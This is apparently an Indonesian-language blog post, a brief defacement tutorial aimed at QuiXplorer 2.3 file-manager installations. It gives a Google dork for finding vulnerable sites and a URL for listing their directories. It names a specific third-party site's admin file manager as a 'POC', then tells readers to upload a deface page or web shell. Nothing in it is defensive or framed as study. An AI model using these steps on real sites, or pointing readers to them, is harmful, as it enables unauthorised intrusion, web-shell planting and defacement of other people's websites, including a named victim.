Dork: intitle:�QuiXplorer 2.3 � the QuiX project�
Exploit: http://%5Btarget%5D/%5Bpath%5D/index.php?action=list&order=name&srt=yes
Kali ini lagi gak mau basa-basi dulu langsung aja kita mulai yah. Oke cari dulu target kita pake dork diatas biasa pake bantuan mbah google. Kalo udah nemu target langsung kita coba upload file kita, tapi ada juga beberapa website yang perlu kita exploit pake url diatas.
POC: http://chilivihao.com/admin/manager/index.php
Kalo udah gini ya tinggal kita upload aja deh file deface/shell kita. Oke selamat mencoba
About the Author
0 comments: